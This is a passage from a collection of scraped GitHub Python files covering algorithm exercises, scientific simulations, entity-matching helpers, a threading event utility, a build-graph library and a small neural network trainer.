x = x.parent\r\n if x.parent:\r\n return x.parent.key\r\n return None\r\n\r\n def pred(x):\r\n if x.left:\r\n return maximum(x.left)\r\n else:\r\n while x.parent.key > x.key:\r\n x = x.parent\r\n if x.parent:\r\n return x.parent.key\r\n return None\r\n\r\n result = 0\r\n for i in T:\r\n if 2*i.key == pred(i) + succ(i):\r\n result += i.key\r\n\r\n return result\r\n\r\n\r\nruntests(sol, all_tests=True)\r\n","repo_name":"Pawel-La/AlgorithmsAndDataStructures","sub_path":"exam_preperation/task4/egz4b/egzP4b.py","file_name":"egzP4b.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43102861313","text":"from random import uniform, gauss\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom ddeint import ddeint\nfrom scipy.special import erf\n\n#omega_by_L = -0.34\n#alpha = 0.17\ntau = 1\nT0 =10\nT1 = 4\nBmin = 1\nBmax = 7\n\n\n\ndef past(t):\n return np.array([(Bmax + Bmin) / 2, (Bmax + Bmin) / 2])\n\n\ndef quenching(B):\n return (1 + erf(B**2 - Bmin**2)) * (1 - erf(B**2 - Bmax**2)) * 0.25\n\n\ndef model(Y, t,alpha):\n \"\"\"\n `omega`: differential rotation\n `L`: length scale of the differential rotation\n `aplha`: coeffecient of alpha-quenching\n `tau`: diffusion time-scale\n \"\"\"\n B_t, A_t = Y(t)\n _, A_T0 = Y(t - T0)\n B_T1, _ = Y(t - T1)\n dB = -2*alpha* A_T0 - (B_t / tau)\n dA = alpha * quenching(B_T1) * B_T1 - ( A_t / tau)\n return [dB, dA]\n\n\ntime_range = 1e3\ntime_steps = 1\ncutoff = 100\n\nfor i in range(70):\n\n #tau = tau1 + i*0.1\n alpha = -1+0.05*i\n N_D = -2*alpha **2 *tau**2 \n tt = np.linspace(0, time_range, int(time_range / time_steps + 1))\n yy = ddeint(model, tt, past, modelargs=(alpha,))\n\n fig, (ax1,ax2, ax3) = plt.subplots(3, 1, sharex=True)\n ax1.plot(tt[cutoff:], yy[cutoff:, 1], \"r\")\n ax1.set_ylabel(\"A\", fontsize=14)\n ax2.plot(tt[cutoff:], yy[cutoff:, 0], \"b\")\n ax2.set_ylabel(\"$B_\\phi$\", fontsize=14)\n ax3.plot(tt[cutoff:], np.square(yy[cutoff:, 0]), \"b\")\n ax3.set_ylabel(\"$B_\\phi^2$\", fontsize=14)\n ax3.set_xlabel(\"Time\", fontsize=14)\n fig.suptitle(f\"$N_D$={N_D:0.2f} $T_0$={T0} $T_1$={T1} $\\omega$/L={-2*alpha} $\\\\tau$={tau}\")\n plt.tight_layout()\n #plt.show()\n plt.savefig(str(N_D)+'.png')\n plt.clf\n","repo_name":"MASTERAMARJEET/SolarDynamo","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38945148832","text":"import math\n\ndef GetV_i(index, r0, r1, r2, u1, u2, N):\n rho3 = 1.0 - (r0*(1-u1) / (r2 + r1 * u2))\n rho3 /= 1.0 - math.pow(r0*(1.0-u1) / (r2 + r1 * u2), N)\n \n V = []\n V_new = []\n V_lin = []\n \n for i in range(0,N+1):\n V.append(1.0 - float(i) / (N))\n V_new.append(V[i])\n V_lin.append(V[i])\n #print(\"V{0} = {1}\".format(i, V[i]))\n \n MAX_ITER = 1000\n MIN_CHANGE = 1e-10\n \n V1_old = V[1]\n \n for it in range(0, MAX_ITER):\n for i in range(1, N):\n nxt = V[i+1]\n prv = V[i-1]\n P_i = float(i*(N-i)) / (i*r1*(1.0-u2) + r0*(N-i))\n new = (r1*(1.0-u2) * nxt + r0 * prv)\n new = new / ((r1*u2*rho3)/P_i + r1*(1.0-u2) + r0)\n V_new[i] = new\n \n for i in range(1,N):\n V[i] = V_new[i] \n \n if abs(V[1] - V1_old) < MIN_CHANGE:\n #print(\"Converged in {0} steps.\".format(i))\n break\n V1_old = V[1]\n \n \n return V[index]\n\n","repo_name":"ccharlesgb/Stochastic-Cancer","sub_path":"OLD/Haeno/Vi.py","file_name":"Vi.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19982125641","text":"# start : 1700\n# 문제정의 : tops 과 bottom의 주사위 리스트를 top이 같은 숫자가 되던, bottom이 같은 숫자가 되게끔 최소한의 스왑을 활용해서 만들어라\n# input : 2 tops,bottom 2*1e4 / 1 top[i],bottom[i] 6\n# output : 만들수 없을땐 -1 / 최소 회전 수\nclass Solution:\n def minDominoRotations(self, tops: List[int], bottoms: List[int]) -> int:\n \n # logic\n # bottom을 바꿀 건지 top을 바꿀건지 먼저 선택을 한다?\n # counter로 세서 확인가능 ??\n # 바꿀 리스트 결정 -> 가장 많은 수를 갖는 곳에서 부터는 안된다.\n # 같은 값을 갖는 곳을 탑기준으로 찾고,\n # 바꿀 리스트를 결정했다면, 어떻게 뽑을지를 결정하자 \n \n# topcount = collections.Counter(tops)\n# bottomcount = collections.Counter(bottoms)\n# # print(topcount,bottomcount)\n# topcount = sorted(topcount, key=lambda x : topcount[x])\n# bottomcount = sorted(bottomcount, key=lambda x : bottomcount[x])\n# # print(topcount,bottomcount)\n \n# if topcount[0] > bottomcount[0] :\n# for t\n \n sames = [tops[i] for i in range(len(tops)) if tops[i] == bottoms[i]]\n print(sames)\n samecount = collections.Counter(sames)\n bottomcount = collections.Counter(bottoms)\n topcount = collections.Counter(tops)\n \n for n in range(1,7):\n if bottomcount[n] + topcount[n] - samecount[n] == len(tops):\n return min(bottomcount[n], topcount[n]) - samecount[n]\n \n return -1","repo_name":"rohos119/daily_algorithm","sub_path":"1007-minimum-domino-rotations-for-equal-row/1007-minimum-domino-rotations-for-equal-row.py","file_name":"1007-minimum-domino-rotations-for-equal-row.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31203148729","text":"from threading import Lock, Condition\nimport logging\nlogger = logging.getLogger('manager')\n\n\nclass Watcher:\n def __init__(self, callback, context):\n \"\"\"\n Params:\n callback - function to be called\n context - Event object\n \"\"\"\n self.callback = callback\n self.context = context\n \n def __eq__(self, other):\n if not isinstance(other, Watcher):\n return False\n if self.callback == other.callback and self.context == other.context:\n return True\n else:\n return False\n \n def __ne__(self, other):\n return not self.__eq__(other)\n \n def __call__(self):\n \"\"\"\n Watcher object is callable\n \"\"\"\n return self.callback( self.context )\n \n\ndef wait_multiple_callback(context):\n context.set()\n \n\nclass Wait(object):\n \"\"\"\n This is abstract class that provides multiple and single wait methods for Event objects\n \"\"\"\n def __init__(self):\n self.lock = Lock()\n self.watchers = []\n \n def add_watcher(self, callback, context):\n \"\"\"\n Add watcher object\n \n Params:\n callback : callable function\n context : Event object\n \"\"\"\n if not callable(callback):\n raise TypeError(\"Callback function must be callable\")\n return\n \n new_watcher = Watcher( callback, context)\n with self.lock:\n self.watchers.append(new_watcher)\n \n if self.is_set(): # called from Event\n logger.debug(\"Wait.add_watcher: watcher signalled during creation. Making callback immediately\")\n callback( context )\n \n def is_set(self):\n \"\"\"\n Abstract method. Must be impleemented in child class\n \"\"\"\n raise TypeError(\"Abstract method called. Must be implemented in Event\")\n \n def remove_watcher(self, callback, context):\n \"\"\"\n Remove watcher object from list\n \"\"\"\n new_watcher = Watcher( callback, context )\n with self.lock:\n for watcher in self.watchers[:]: # iterate through copy of the list\n if watcher == new_watcher:\n self.watchers.remove(watcher)\n return\n \n def notify(self):\n \"\"\"\n Notify watchers\n \"\"\"\n with self.lock:\n for watcher in self.watchers:\n watcher() # Watcher is callable\n \n @staticmethod\n def multiple( objects, num_objects=None, timeout = None):\n \"\"\"\"\n Wait for one of the multiple Events passed in a objects dictionary\n \n Params:\n objects : dictionary of objects derived from Event clas\n mum_objects : number of objects in dictionary\n timeout : timeout - None means forewer\n \n \"\"\"\n if num_objects == None:\n num_objects = len(objects)\n \n wait_event = Event(\"Watcher\")\n \n for i in range( num_objects ):\n objects[i].add_watcher( wait_multiple_callback, wait_event)\n \n res = -1\n sig = \"Signaled: \"\n if ( wait_event.wait( timeout ) ):\n for i in range( num_objects ):\n if objects[i].is_set():\n sig = sig + \"[%d]\" % i\n if res == -1: #catch first event only (lower has higier priority)\n res = i\n \n logger.debug(\"Wait.multiple: %s\" % sig )\n \n for i in range( num_objects ):\n objects[i].remove_watcher( wait_multiple_callback, wait_event )\n \n wait_event.clear()\n return res\n \n @staticmethod\n def single( single_object, timeout = None):\n \"\"\"\n Wait for single Event emulated with Wait.multiple\n \"\"\"\n objects = [single_object]\n return Wait.multiple(objects, 1 , timeout)\n\nclass Event(Wait):\n def __init__(self, name):\n self.__flag = False\n self.__name = name\n self.__cond = Condition(Lock())\n Wait.__init__(self) \n \n def __repr__(self):\n return self.__name\n \n def is_set(self):\n return self.__flag\n\n def set(self):\n self.__cond.acquire()\n try:\n self.__flag = True\n self.__cond.notify_all()\n finally:\n self.__cond.release()\n \n self.notify()\n \n def clear(self):\n self.__cond.acquire()\n try:\n self.__flag = False\n finally:\n self.__cond.release()\n \n def wait(self, timeout=None):\n self.__cond.acquire()\n try:\n signaled = self.__flag\n if not signaled:\n signaled = self.__cond.wait(timeout)\n return signaled\n finally:\n self.__cond.release() \n ","repo_name":"kstaniek/has","sub_path":"has/utils/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12533483423","text":"import os\nimport itertools\n\nfrom p006 import sum_formula\n\n\ndef order_of_string(string: str) -> int:\n ''' Returns the numerical order of a upper case string. For example \"BABY\" is 2+1+2+25=30'''\n result = sum(ord(char) - ord('A') + 1 for char in string)\n return result\n\n\ndef neccesary_triangles(n: int) -> list[int]:\n '''Returns a list of all triangle numbers smaller or equal to n>=3'''\n triangle_numbers = []\n for k in itertools.count(1):\n triangle_number = sum_formula(k)\n if triangle_number > n:\n break\n else:\n triangle_numbers.append(triangle_number)\n return triangle_numbers\n\n\ndef main():\n ''' Returns the number of triangle word in the file p042_words.txt. \n Triangle words are words whose numerical value corresponds to a number of the form n*(n+1)/2.\n To this end, we convert the txt-file to a list of their corresponding numerical values.\n Then we compute all triangle numbers up to the maximum of list of numerical values.'''\n\n file_path = os.path.join(os.getcwd(), 'data', 'p042_words.txt')\n\n with open(file_path, 'r') as LIST_OF_WORDS:\n numerical_words = [order_of_string(\n word.strip('\"')) for word in LIST_OF_WORDS.read().split(',')]\n\n max_value = max(numerical for numerical in numerical_words)\n necc_triangles = neccesary_triangles(max_value)\n\n result = sum(\n 1 for numerical in numerical_words if numerical in necc_triangles)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"XASHA-XII/Euler_Project","sub_path":"problems/p042.py","file_name":"p042.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18500952463","text":"import sys\n\n_, infile, outfile = sys.argv\nwords = []\nwordmap = {}\nindices = []\nbyte = lambda b: bytes((b,))\nw2i = lambda w: (w[1] << 8) | w[0]\nwith open(infile, \"rb\") as i:\n global data\n data = i.read()\n data = [data[i:i+2] for i in range(0,len(data),2)]\nitems = set(data)\nfreqs = {k: 0 for k in items}\nfor i in data:\n freqs[i] += 1\nitems = sorted(items, key=freqs.get, reverse=True)\nindices = {}\nfor i in range(len(items)):\n indices[items[i]] = i\nwith open(outfile, \"wb\") as o:\n o.write(byte(len(items)-1))\n o.write(b\"\".join(items))\n for d in data:\n o.write(byte(indices[d]))","repo_name":"PoolloverNathan/SuperTanks","sub_path":"qbw-compress.py","file_name":"qbw-compress.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30978076432","text":"import pandas as pd\nimport Levenshtein\n\n# Function to asure tables have IDs for the Magellan pipeline.\ndef create_index_as_id (path):\n df = pd.read_csv(path)\n cols = df.columns.values.tolist()\n if 'ID' in cols:\n print(\"ID already exists!\")\n return\n else:\n df['ID'] = df.index + 1\n print(\"Creating indices...\")\n # Move ID column to first position. \n df = df[ ['ID'] + [ col for col in df.columns if col != 'ID' ] ]\n df.to_csv(path, index=False)\n print(\"Indicies created succesfully!\")\n\ndef create_index_as_id_for_dataframe (table):\n cols = table.columns.values.tolist()\n if 'ID' in cols:\n print(\"ID already exists!\")\n return table\n else:\n table['ID'] = table.index + 1\n print(\"Creating indices...\")\n # Move ID column to first position. \n table = table[ ['ID'] + [ col for col in table.columns if col != 'ID' ] ]\n return table\n\n# Blackbox function for the blackbox blocker in Magellan.\ndef is_year_year(x, y):\n # x, y will be of type pandas series\n \n # get year attribute\n x = x['Year'] # Consists of multiple Years\n y = y['Year']\n\n x = x.split()\n\n if len(x) == 1:\n if x[0] == y:\n return False\n else:\n return True\n else:\n for year in x:\n if str(year) == str(y):\n return False\n return True\n\ndef ditto_reformater(data):\n columns = []\n values = []\n value_writer = \"\"\n sentence_order = 0\n table_order = 0\n table1 = pd.DataFrame()\n table2 = pd.DataFrame()\n table3 = pd.DataFrame()\n starting_row = True\n\n for line in data.splitlines():\n table_order = 0\n for side in line.split(\"\\t\"):\n for word in side.split(\" \"):\n if word == \"COL\":\n if value_writer != \"\" and value_writer != \" \":\n values.append(value_writer)\n elif not starting_row:\n values.append(float(\"NaN\"))\n else:\n starting_row = False\n read_column = True\n read_values = False\n elif word == \"VAL\":\n read_column = False\n read_values = True\n first_word = True\n value_writer = \"\"\n else:\n if read_column:\n columns.append(word)\n elif read_values:\n if first_word:\n value_writer = word\n first_word = False\n else:\n value_writer += \" \" + word\n values.append(value_writer)\n value_writer = \"\"\n starting_row = True\n res = dict(zip(columns, values))\n if sentence_order == 0:\n if table_order == 0:\n table1 = pd.DataFrame.from_dict([res])\n table_order = 1\n elif table_order == 1:\n table2 = pd.DataFrame.from_dict([res])\n table_order = 2\n elif table_order == 2:\n table3 = pd.DataFrame([word], columns=['Truth'])\n table_order = 0\n values = []\n sentence_order = sentence_order + 1\n else:\n if table_order == 0:\n table1 = table1.append(res, ignore_index=True)\n table_order = 1\n elif table_order == 1:\n table2 = table2.append(res, ignore_index=True)\n table_order = 2\n elif table_order == 2:\n table3 = table3.append({'Truth': word}, ignore_index=True)\n table_order = 0\n values = []\n \n table3[\"Truth\"] = pd.to_numeric(table3[\"Truth\"])\n return table1, table2, table3\n\ndef clean_ABV_value(table):\n new_values = []\n for row in table.itertuples():\n new_values.append(row[4].split(\"%\")[0] + \" %\")\n for i in range(0, len(new_values)):\n if \"-\" in new_values[i]:\n new_values[i] = \"-\"\n temp = pd.DataFrame(new_values, columns=[\"ABV\"])\n table['ABV'] = temp\n return table\n\ndef magellan_reformater(table):\n table_columns = list(table.columns)\n total_attr = len(table_columns) - 1\n half_attr = total_attr / 2\n\n\n ditto_formatted = \"\"\n for row in table.itertuples(False):\n value_writer = \"\"\n for i in range(0, half_attr):\n value_writer += \"COL \" + table_columns[i] + \" VAL \" + row[i] + \" \"\n value_writer += \"\\t\"\n for i in range(half_attr, total_attr):\n value_writer += \"COL \" + table_columns[i] + \" VAL \" + row[i] + \" \"\n value_writer += \"\\t\" + row[total_attr] + \"\\n\"\n ditto_formatted += value_writer\n\n return ditto_formatted\n\n# For careful data ensuring.\ndef ensure_data(table, alike = True, threshold = 0.8 ):\n table_columns = list(table.columns)\n total_attr = len(table_columns) - 1\n half_attr = int(total_attr / 2)\n\n\n new_df = pd.DataFrame()\n for row in table.itertuples(index=False):\n similarity_dict = dict()\n for i in range(0, half_attr):\n try:\n similarity_dict[i] = Levenshtein.ratio(row[i], row[half_attr+i])\n except TypeError:\n similarity_dict[i] = 1\n if alike:\n if all(x > threshold for x in similarity_dict.values()):\n temp = pd.Series(row, table_columns)\n new_df = new_df.append(temp, ignore_index=True)\n else:\n if all(x < threshold for x in similarity_dict.values()):\n temp = pd.Series(row, table_columns)\n new_df = new_df.append(temp, ignore_index=True)\n\n new_df.rename(columns = {'Index':'_id'}, inplace = True)\n return new_df","repo_name":"upforde/Idun","sub_path":"magellan/Notebooks/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5345112092","text":"'''The main difference here is that I don't pre-initialise the dictionaries'''\n\nfrom collections import deque\nfrom collections import defaultdict\n\n\ndef topo_sort(_, edges):\n adjacent = defaultdict(list)\n in_degrees = defaultdict(int)\n\n for parent, child in edges:\n in_degrees[child] += 1 \n adjacent[parent].append(child)\n\n sources = deque()\n \n # find the nodes with no parents\n for parent, _ in adjacent.items():\n if parent not in in_degrees:\n sources.append(parent)\n\n output = []\n\n while sources:\n source = sources.popleft()\n output.append(source)\n \n for child in adjacent[source]:\n in_degrees[child] -=1\n\n if in_degrees[child] == 0:\n sources.append(child)\n \n return output\n\n\nprint(topo_sort(5, [[4, 2], [4, 3], [2, 0], [2, 1], [3, 1]]))\nprint(topo_sort(7, [[6, 4], [6, 2], [5, 3], [5, 4], [3, 0], [3, 1], [3, 2], [4, 1]]))","repo_name":"codeybear/AlgoStuff","sub_path":"topological_sort/topological_sort_me.py","file_name":"topological_sort_me.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9406928644","text":"def minimumAbsoluteDifference(arr):\n # Write your code here\n arr.sort()\n print(arr)\n m=abs(arr[-1]-arr[0])\n \n for i in range(1,len(arr)):\n if arr[i]-arr[i-1]= snap_start:\n filepaths = np.flip(filepaths[:snap_start+1])\n haloids = np.flip(haloids[:snap_start+1])\n h1ids = np.flip(h1ids[:snap_start+1])\n \n # filepaths and haloids now go the \"right\" way, i.e. starts from start_snap and goes until z=0\n assert len(filepaths) == len(haloids)\n assert len(haloids) == len(h1ids)\n\n # we save the data as an .hdf5 file since this is meant for large datasets, so that should work pretty good\n output = run_tracking(sim, z0haloid, filepaths, haloids, h1ids)\n output.to_hdf('../../Data/tracked_stars.hdf5',key=f'{sim}_{z0haloid}')\n\n\n\n\n\n\n\n \n\n\n\n\n\n \n","repo_name":"hollisakins/Justice_League_Code","sub_path":"Analysis/RamPressure/particletracking_stars.py","file_name":"particletracking_stars.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20231768468","text":"# 문제 출처 : https://school.programmers.co.kr/learn/courses/30/lessons/42890\n\n\ndef solution(relation):\n col_len = len(relation[0])\n col_sets = get_col_sets(col_len)\n unique_col_set = get_unique_key(col_sets, relation)\n candidate_key = get_candidate_key(unique_col_set)\n\n return len(candidate_key)\n\n\ndef get_unique_key(col_sets, relation):\n\n return [col_set for col_set in col_sets if check_uniqueness(col_set, relation)]\n\n\ndef get_candidate_key(unique_col_set):\n unique_col_set.sort(key=lambda x: len(x))\n candidate_key = []\n\n for col_set in unique_col_set:\n if all([len(set(key) - set(col_set)) for key in candidate_key]):\n candidate_key.append(col_set)\n\n return candidate_key\n\n\ndef get_col_sets(col_len):\n col_sets = []\n\n for mask in range(1, 1 << col_len):\n select_col = list(bin(mask)[2:].zfill(col_len))\n col_set = [\n col_idx for col, col_idx in zip(select_col, range(col_len)) if col == \"1\"\n ]\n col_sets.append(col_set)\n\n return col_sets\n\n\n# itertools.combinations 모듈 이용\n# def get_col_sets(col_len):\n# from itertools import combinations\n\n# col_sets = []\n# for r in range(1, col_len + 1):\n# col_sets += list(combinations(range(col_len), r))\n\n# return col_sets\n\n\ndef check_uniqueness(col_set, relation):\n col_projection = []\n\n for row in relation:\n col_projection.append(tuple([row[col] for col in col_set]))\n\n return len(col_projection) == len(set(col_projection))\n","repo_name":"Su-minn/coding-test","sub_path":"Kakao_Problem/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1254851362","text":"import argparse\nimport json\nimport multiprocessing as mp\nimport os\nimport logging\nimport datetime\n\nfrom abc import ABCMeta, abstractmethod\n\nimport networkx as nx\nimport networkx.algorithms.dag as dag\n\nfrom makegrind.node import (\n TargetNode,\n BuildNode,\n BuildNodeInfoView,\n TargetNodeInfoView,\n)\nimport makegrind.reports as reports\n\n__all__ = [\"TargetDiGraph\", \"BuildDiGraph\"]\n\nlogger = logging.getLogger(__name__)\n\n\nclass MakeGrindDiGraph(nx.DiGraph, metaclass=ABCMeta):\n __cached__ = [\"_reduced\", \"_entry\"]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.clear()\n\n def clear(self):\n \"\"\"Clears cached attributes\"\"\"\n for x in self.__cached__:\n setattr(self, x, None)\n\n def nodekey(self, target):\n return self.node_attr_dict_factory.nodekey(target)\n\n @property\n @abstractmethod\n def node_info_view_factory(self):\n \"\"\"Class that generates a node info view\"\"\"\n return\n\n @property\n def info(self):\n return self.node_info_view_factory(self)\n\n @property\n def reduced(self):\n if self._reduced is None:\n self._reduced = dag.transitive_reduction(self)\n\n return self._reduced\n\n @property\n def entry(self):\n if self._entry is None:\n for node in dag.topological_sort(self):\n if self.nodes[node].valid:\n self._entry = node\n break\n else:\n raise mg_exceptions.TargetNotFoundError(\"Unable to find entry point\")\n\n return self.nodes[self._entry]\n\n def heaviest_child(self, node):\n return max(\n self.reduced.successors(node),\n key=lambda x: self.nodes[x].elapsed,\n default=None,\n )\n\n def heaviest_path(self, start=None):\n if start is None:\n start = self.entry.key\n\n while start:\n yield start\n start = self.heaviest_child(start)\n\n\nclass TargetDiGraph(MakeGrindDiGraph):\n node_attr_dict_factory = TargetNode\n node_info_view_factory = TargetNodeInfoView\n\n def add_target(self, target):\n key = self.nodekey(target)\n depends = target.pop(\"depends\", list())\n if key not in self.nodes:\n self.add_node(key)\n self.nodes[key].update(target)\n\n for dep in [{\"pid\": target[\"pid\"], \"name\": x} for x in depends]:\n self.add_edge(key, self.nodekey(dep))\n\n def add_nodes_from_build(self, build, targets):\n for target in targets:\n target[\"pid\"] = build.pid\n target[\"directory\"] = build.directory\n self.add_target(target)\n\n def add_parent_edges(self, build, parent):\n pkey = self.nodekey({\"pid\": parent[\"pid\"], \"name\": parent[\"target\"]})\n for entry in build.entry:\n self.add_edge(pkey, entry)\n self.nodes[pkey][\"recursive\"] = True\n\n @property\n def elapsed_recipe(self):\n return sum(\n (\n d.elapsed_recipe\n for d in self.info.values()\n if not d.get(\"recursive\", False)\n ),\n datetime.timedelta(),\n )\n\n\nclass BuildDiGraph(MakeGrindDiGraph):\n node_attr_dict_factory = BuildNode\n node_info_view_factory = BuildNodeInfoView\n\n def __init__(self):\n super().__init__()\n self.targets = TargetDiGraph()\n self._entry = None\n\n def update(self, edges=None, nodes=None):\n super().update(edges, nodes)\n if hasattr(edges, \"targets\"):\n self.targets.update(edges.targets)\n\n def relpath(self, path):\n \"\"\"Returns the path relative to the root directory of the graph\"\"\"\n if path is not None and path.startswith(\"/\"):\n path = os.path.relpath(path, self.prefix)\n\n if path == \".\":\n path = os.path.basename(self.prefix)\n\n return path\n\n @property\n def prefix(self):\n return self.entry.directory\n\n @staticmethod\n def node_name(pid, target):\n return \"{}:{}\".format(pid, target)\n\n @property\n def jobs(self):\n return self.entry.jobs\n\n @property\n def elapsed(self):\n return self.entry.elapsed\n\n @property\n def elapsed_recipe(self):\n return self.targets.elapsed_recipe\n\n def add_nodes_from_build(self, build):\n logger.debug(\"Adding build with pid: %s\", build[\"pid\"])\n targets = build.pop(\"targets\", list())\n key = self.nodekey(build)\n\n self.add_node(key, **build)\n\n self.targets.add_nodes_from_build(self.nodes[key], targets)\n\n if \"parent\" in build:\n self.add_edge(self.nodekey(build[\"parent\"]), key)\n self.targets.add_parent_edges(self.nodes[key], build[\"parent\"])\n\n @classmethod\n def from_remake(cls, json_path):\n \"\"\"Generate the graph from a json file output from remake\"\"\"\n\n logger.debug(\"Loading data from: %s\", json_path)\n try:\n with open(json_path) as fd:\n return cls.from_json(fd.read())\n except Exception as e:\n logger.error(\"Error loading json from '%s'\", json_path)\n raise e\n\n @classmethod\n def from_json(cls, json_str):\n \"\"\"Generate the graph from a json string\"\"\"\n return cls.from_build(json.loads(json_str))\n\n @classmethod\n def from_build(cls, build):\n graph = cls()\n graph.add_nodes_from_build(build)\n return graph\n","repo_name":"Arrowbox/makegrind","sub_path":"src/makegrind/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"2239821828","text":"import numpy as np\nimport math\nimport random\nimport copy\n\nALPHA = 0.2\nE = 0.01\n\n\ndef multiplication(matrix_1, matrix_2):\n matrix_1 = copy.deepcopy(matrix_1)\n matrix_2 = copy.deepcopy(matrix_2)\n transposed_matrix_2 = list(zip(*matrix_2))\n\n return [[sum(el1 * el2 for el1, el2 in zip(row_1, col_2)) for col_2 in transposed_matrix_2] for row_1 in matrix_1]\n\n\ndef ELU(x_input):\n if x_input >= 0:\n return x_input\n if x_input < 0:\n result = ALPHA * (math.exp(x_input) - 1)\n return result\n\n\ndef ELU_dif(x_input):\n if x_input > 0:\n return 1\n else:\n return ELU(x_input) + ALPHA\n\n\ndef sigma_func(x_input):\n return 1/(1 + math.exp((-1) * x_input))\n\n\ndef sigma_func_def(x_input):\n return sigma_func(x_input) * (1 - sigma_func(x_input))\n\n\ndef factorial(x_input):\n result = 1\n for i in range(1, x_input + 1):\n result *= i\n return result\n\n\ndef create_window(sequence, rows, columns):\n window = []\n for row in range(rows):\n new_row = []\n for col in range(columns):\n new_row.append(sequence[row + col])\n window.append(new_row)\n return window\n\n\ndef predict_next(W1, W2, line):\n input_layer = np.array(line + [0])\n hidden_layer = np.matmul(input_layer, W1)\n output_layer = np.matmul(hidden_layer, W2)\n result = math.fabs(output_layer[0])\n return result\n\n\nchoice = input(\"Выберите режим работы: 1 - обучение; !1 - предсказание: \")\nif choice == '1':\n X_choice = input(\"Выберите последовательность: \\n1 - ряд Фиббоначи\\n\"\n \"2 - факториальная функция\\n3 - периодическая функция\\n4 - степенная функция\\n\\n\")\n X_count = int(input(\"Выберите количество элементов в выбранной последовательности: \"))\n X = []\n if X_choice == '1':\n row_type = \"fib\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_fibonacci in range(2, X_count):\n X[index_of_fibonacci] = X[index_of_fibonacci - 1] + X[index_of_fibonacci - 2]\n print(X)\n if X_choice == '2':\n row_type = \"fac\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_factorial in range(X_count):\n X[index_of_factorial] = factorial(index_of_factorial + 1)\n print(X)\n if X_choice == '3':\n row_type = \"loop\"\n for index_of_primary_fill in range(X_count):\n if index_of_primary_fill % 2 == 0:\n X.append(1)\n else:\n X.append(0)\n print(X)\n if X_choice == '4':\n row_type = \"pow\"\n x_pow = int(input(\"Введите степень для степенной функции: \"))\n for index_of_pow_func in range(X_count):\n X.append(index_of_pow_func ** x_pow)\n print(X)\n\n E = float(input(\"Введите ошибку: \"))\n ALPHA = float(input(\"Введите коэффициент обучения: \"))\n L = int(input(\"Введите количество столбцов в матрице обучения: \"))\n # p = int(input(\"Введите количество строк в матрице обучения: \"))\n limit_of_iterations = int(input(\"Введите количество шагов обучения, которые может пройти сеть: \"))\n\n # L = 4\n p = len(X) - L - 1\n # limit_of_iterations = 1000\n number_of_neurons_on_hidden_layer = 5\n\n learning_window = create_window(X, p, L)\n contexts_list = []\n for adding_contexts in range(len(learning_window)):\n new_context = [0]\n contexts_list.append(new_context)\n\n W1 = []\n W2 = []\n\n # ==================== ИНИЦИАЛИЗАЦИЯ ВЕСОВЫХ МАТРИЦ\n\n for init_w1_index_row in range(L + 1):\n new_row = []\n for init_w1_index_col in range(number_of_neurons_on_hidden_layer):\n weight = np.random.randn() / 10\n new_row.append(weight)\n W1.append(new_row)\n\n for init_w2_index_row in range(number_of_neurons_on_hidden_layer):\n weight = np.random.randn() / 10\n W2.append([weight])\n\n # ==================== ОБУЧЕНИЕ\n\n sum_err = E + 1\n current_iteration = 0\n while sum_err > E and current_iteration < limit_of_iterations:\n current_iteration += 1\n for sample_index in range(len(learning_window) - 1):\n input_layer = np.array(learning_window[sample_index] + contexts_list[sample_index])\n hidden_layer = np.matmul(input_layer, np.array(W1))\n for activating_index in range(len(hidden_layer)):\n hidden_layer[activating_index] = sigma_func(hidden_layer[activating_index])\n output_layer = np.matmul(hidden_layer, np.array(W2))\n output_layer[0] = sigma_func(output_layer[0])\n\n contexts_list[sample_index][0] = output_layer[0]\n\n intended_outcome = learning_window[sample_index + 1][L - 1]\n err = output_layer[0] - intended_outcome\n\n # ============ КОРРЕКТИРОВКА МАТРИЦ\n\n XT_W2T = np.matmul(np.array([input_layer]).T, np.array(W2).T)\n inactive_hidden_layer = np.matmul([input_layer], W1)\n deactivated_hidden_layer = []\n for deactivating_index in range(len(inactive_hidden_layer[0])):\n deactivated_hidden_layer.append(sigma_func_def(inactive_hidden_layer[0][deactivating_index]))\n Xt_W2T_DHL = np.array(multiplication(list(XT_W2T), [deactivated_hidden_layer]))\n\n for multiplying_index in range(len(Xt_W2T_DHL)):\n Xt_W2T_DHL[multiplying_index][0] *= ALPHA\n Xt_W2T_DHL[multiplying_index][0] *= err\n\n W1 = np.array(W1) - Xt_W2T_DHL\n\n deactivated_output_layer = 